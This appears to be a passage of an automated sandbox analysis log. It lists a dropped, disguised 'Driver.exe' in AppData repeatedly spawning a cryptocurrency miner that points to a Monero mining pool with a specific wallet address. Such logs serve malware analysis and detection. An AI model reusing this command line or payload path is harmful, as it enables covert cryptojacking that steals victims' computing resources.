- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1720
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2364
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2516
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2688
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2792
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2008
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2456
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2120
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1652
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2244
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:340
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1928
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1856
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:3052
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:108
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1900
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:864
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2416
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2168
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1792
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2752
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2688
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:3024
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1916
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2968
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1808
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1668
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2368
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2352
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2164
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1612
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2040
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:768
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:3016
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1448
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:3008
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2996
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2356
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2240
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2216
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2840
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1772
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2708
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2472
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2312
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1192
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2124
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2576
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:3044
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2060
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2768
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2680
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2712
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2396
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:3032
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1208
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2748
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2732
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2760
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2716
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1252
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:496
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:588
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:556
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:3060
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:3064
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
